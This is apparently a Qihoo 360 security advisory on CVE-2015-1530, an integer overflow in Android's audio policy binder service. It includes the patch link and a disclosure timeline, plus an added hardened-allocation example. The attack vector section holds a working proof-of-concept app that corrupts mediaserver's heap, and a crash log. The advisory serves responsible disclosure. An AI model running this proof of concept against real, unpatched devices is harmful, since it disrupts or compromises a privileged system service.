March 12, 2015

An integer overflow in Android media could be exploited to get media_server permission(CVE-2015-1530)

#############################################################################
#
# QIHU 360 SOFTWARE CO. LIMITED http://www.360safe.com/
#
#############################################################################
#
# CVE ID: CVE-2015-1530
# Product: Android
# Vendor: Google
# Subject: An integer overflow in Android media could be exploited to get media_server permission
# Effect: Gain privileges or cause a denial of service
# Author: Guang Gong
# Date: March 11th 2015
#
#############################################################################

Introduction

An integer overflow in the BnAudioPolicyService::onTransact function in frameworks/av/media/libmedia/IAudioPolicyService.cpp in Android through 5.0 allows attackers to gain privileges or cause a denial of service (memory corruption) via a transaction that supplies a large count value.

Affected Android version

All versions below Lollipop 5.1.

Patches

Android Bug id 18226810
https://android.googlesource.com/platform/frameworks/av/+/e360f0f6cad290f69e07fd3a20dcf11a1dbc4160

Description

The vulnerable code is as follows.
http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#661

        case QUERY_DEFAULT_PRE_PROCESSING: {
            CHECK_INTERFACE(IAudioPolicyService, data, reply);
            int audioSession = data.readInt32();
            uint32_t count = data.readInt32();
            uint32_t retCount = count;
            // count is supplied by the binder client and can be any value, so
            // count * sizeof(effect_descriptor_t) can overflow; the later write
            // into the undersized buffer corrupts the heap.
            effect_descriptor_t *descriptors =
                    (effect_descriptor_t *)new char[count * sizeof(effect_descriptor_t)];
            status_t status = queryDefaultPreProcessing(audioSession, descriptors, &retCount);
            reply->writeInt32(status);
            if (status != NO_ERROR && status != NO_MEMORY) {
                retCount = 0;
            }
            reply->writeInt32(retCount);
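As an added example (not code from the advisory or from AOSP), the following C program reproduces the 32-bit arithmetic behind the bug and places it beside a hardened allocation path. The stand-in effect_descriptor_t is assumed to be 172 bytes, the element size for which the PoC's count of 0xfffffff wraps to exactly the 3221225300 bytes reported in the crash log further down; MAX_PREPROC_COUNT is an upper bound chosen for this example, not a constant taken from the patch. The function and type names are this example's own.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>

/* Stand-in for Android's effect_descriptor_t (constructed for this example).
 * Assumption: the real struct is 172 bytes, the element size for which
 * count = 0x0fffffff wraps to the 3221225300 bytes seen in the crash log. */
typedef struct { uint8_t blob[172]; } effect_descriptor_t;

/* Assumed upper bound on descriptors a single query may request; chosen for
 * this example, not taken from AOSP. */
#define MAX_PREPROC_COUNT 16u

/* The vulnerable arithmetic as a 32-bit build evaluates it: count (uint32_t)
 * times a 32-bit size_t is a 32-bit multiply, so the product wraps mod 2^32
 * and the buffer handed to the writer is far smaller than count elements. */
uint32_t vulnerable_alloc_bytes(uint32_t count) {
    uint32_t elem = (uint32_t)sizeof(effect_descriptor_t);
    return count * elem;
}

/* Hardened size computation. Returns 1 and stores the byte count when the
 * request is acceptable, 0 when count exceeds the protocol bound or the
 * product would not fit in size_t (SIZE_MAX / elem is the largest safe count). */
int checked_alloc_bytes(uint32_t count, size_t *out_bytes) {
    size_t elem = sizeof(effect_descriptor_t);
    if (count > MAX_PREPROC_COUNT)
        return 0;
    if (count > SIZE_MAX / elem)
        return 0;
    *out_bytes = (size_t)count * elem;
    return 1;
}

/* Convenience wrapper: the accepted byte count, or 0 when rejected. */
size_t accepted_bytes(uint32_t count) {
    size_t bytes = 0;
    return checked_alloc_bytes(count, &bytes) ? bytes : 0;
}

/* Hardened allocation: NULL for rejected or zero counts, otherwise a zeroed
 * buffer that genuinely holds `count` descriptors. */
effect_descriptor_t *alloc_descriptors_checked(uint32_t count) {
    size_t bytes;
    if (!checked_alloc_bytes(count, &bytes) || bytes == 0)
        return NULL;
    return (effect_descriptor_t *)calloc(count, sizeof(effect_descriptor_t));
}

/* Exercise the hardened path end to end: allocate, touch every element the
 * caller asked for, free. Returns 1 on success, 0 if the request was refused. */
int fill_descriptors_roundtrip(uint32_t count) {
    effect_descriptor_t *d = alloc_descriptors_checked(count);
    if (d == NULL)
        return 0;
    for (uint32_t i = 0; i < count; i++)
        d[i].blob[0] = (uint8_t)i;   /* in-bounds: the buffer has `count` slots */
    free(d);
    return 1;
}

int main(void) {
    uint32_t poc_count = 0x0fffffffu;   /* the count value the advisory's PoC sends */
    printf("vulnerable: count=0x%" PRIx32 " -> new char[%" PRIu32 "]\n",
           poc_count, vulnerable_alloc_bytes(poc_count));
    printf("hardened:   count=0x%" PRIx32 " -> %s\n", poc_count,
           accepted_bytes(poc_count) ? "accepted" : "rejected");
    printf("hardened:   count=4 -> %zu bytes, roundtrip=%d\n",
           accepted_bytes(4u), fill_descriptors_roundtrip(4u));
    return 0;
}
```

The division check is the generic guard against multiplicative overflow and is what makes the 32-bit build safe; the explicit count cap matters on 64-bit builds too, where the multiply does not wrap but an unbounded count still lets a client force an allocation of tens of gigabytes and abort the service.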

Attack vector

A normal app can corrupt the heap in mediaserver through this vulnerability. The PoC that corrupts the heap is as follows:

// Header list and sp<> template arguments reconstructed; the original
// lines lost their angle-bracket contents in extraction.
#include <stdint.h>
#include <binder/IBinder.h>
#include <binder/IServiceManager.h>
#include <media/IAudioPolicyService.h>
#include <hardware/audio_effect.h>
#include <system/audio.h>
#include <utils/RefBase.h>
#include <utils/String16.h>

using namespace android;

int main(__attribute__((unused)) int argc, __attribute__((unused)) char* const argv[])
{
    sp<IServiceManager> sm = defaultServiceManager();
    sp<IBinder> service = sm->checkService(String16("media.audio_policy"));
    sp<IAudioPolicyService> iPolicy = IAudioPolicyService::asInterface(service);
    effect_descriptor_t descriptors;
    uint32_t count = 0xfffffff;
    iPolicy->getInput((audio_source_t)0, 8000, (audio_format_t)1, AUDIO_CHANNEL_IN_FRONT, 1);
    iPolicy->queryDefaultPreProcessing(1, &descriptors, &count);
    return 0;
}

The log of the crashing mediaserver is as follows:

--------- beginning of crash
F/libc    (  184): new[] failed to allocate 3221225300 bytes
F/libc    (  184): Fatal signal 6 (SIGABRT), code -6 in tid 654 (Binder_1)
I/DEBUG   (  180): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   (  180): Build fingerprint: 'Android/aosp_hammerhead/hammerhead:4.4.3.43.43.43/AOSP/ggong10171501:userdebug/test-keys'
I/DEBUG   (  180): Revision: '10'
I/DEBUG   (  180): ABI: 'arm'
I/DEBUG   (  180): pid: 184, tid: 654, name: Binder_1  >>> /system/bin/mediaserver <<<
I/DEBUG   (  180): signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
W/NativeCrashListener(  613): Couldn't find ProcessRecord for pid 184
I/DEBUG   (  180): Abort message: 'new[] failed to allocate 3221225300 bytes'
E/DEBUG   (  180): AM write failure (32 / Broken pipe)
I/DEBUG   (  180):     r0 00000000  r1 0000028e  r2 00000006  r3 00000000
I/DEBUG   (  180):     r4 b46ffdb8  r5 00000006  r6 0000000c  r7 0000010c
I/DEBUG   (  180):     r8 0fffffff  r9 000003f5  sl 000000b8  fp 00000001
I/DEBUG   (  180):     ip 0000028e  sp b46ffab8  lr b6f44941  pc b6f6676c  cpsr 60070010
I/DEBUG   (  180): 
I/DEBUG   (  180): backtrace:
I/DEBUG   (  180):     #00 pc 0003576c  /system/lib/libc.so (tgkill+12)
I/DEBUG   (  180):     #01 pc 0001393d  /system/lib/libc.so (pthread_kill+52)
I/DEBUG   (  180):     #02 pc 000143e7  /system/lib/libc.so (raise+10)
I/DEBUG   (  180):     #03 pc 00010e8d  /system/lib/libc.so (__libc_android_abort+36)
I/DEBUG   (  180):     #04 pc 0000f954  /system/lib/libc.so (abort+4)
I/DEBUG   (  180):     #05 pc 00012225  /system/lib/libc.so (__libc_fatal+16)
I/DEBUG   (  180):     #06 pc 000128fd  /system/lib/libc.so (operator new[](unsigned int)+16)
I/DEBUG   (  180):     #07 pc 00056367  /system/lib/libmedia.so (android::BnAudioPolicyService::onTransact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int)+1158)
I/DEBUG   (  180):     #08 pc 000167a5  /system/lib/libbinder.so (android::BBinder::transact(unsigned int, android::Parcel const&, android::Parcel*, unsigned int)+60)
I/DEBUG   (  180):     #09 pc 0001aea3  /system/lib/libbinder.so (android::IPCThreadState::executeCommand(int)+562)
I/DEBUG   (  180):     #10 pc 0001afbf  /system/lib/libbinder.so (android::IPCThreadState::getAndExecuteCommand()+38)
I/DEBUG   (  180):     #11 pc 0001b001  /system/lib/libbinder.so (android::IPCThreadState::joinThreadPool(bool)+48)
I/DEBUG   (  180):     #12 pc 0001ee93  /system/lib/libbinder.so
I/DEBUG   (  180):     #13 pc 0000e97d  /system/lib/libutils.so (android::Thread::_threadLoop(void*)+112)
I/DEBUG   (  180):     #14 pc 0000e505  /system/lib/libutils.so
I/DEBUG   (  180):     #15 pc 00013133  /system/lib/libc.so (__pthread_start(void*)+30)
I/DEBUG   (  180):     #16 pc 0001120b  /system/lib/libc.so (__start_thread+6)
I/DEBUG   (  180): 
I/DEBUG   (  180): Tombstone written to: /data/tombstones/tombstone_00
I/BootReceiver(  613): Copying /data/tombstones/tombstone_00 to DropBox (SYSTEM_TOMBSTONE)

Milestones

Date        Comment                                                    Sender
03/11/2014  Initial Report of CVE-2015-1530                            Qihoo
08/11/2014  Have validated and have created a suitable fix internally  Google
11/11/2014  Sent the Android Bug ID 18226810                           Google
10/2/2015   Sent the CVE-ID                                            Google
11/3/2015   Lollipop 5.1 was released, disclosed it                    Qihoo

References

[1] https://android.googlesource.com/platform/frameworks/av/+/e360f0f6cad290f69e07fd3a20dcf11a1dbc4160
[2] http://androidxref.com/4.4.4_r1/xref/frameworks/av/media/libmedia/IAudioPolicyService.cpp#661

Link to this post: http://blogs.360.cn/post/an-integer-overflow-in-android-media-could-be-exploited-to-get-media_server-permission.html

-- EOF --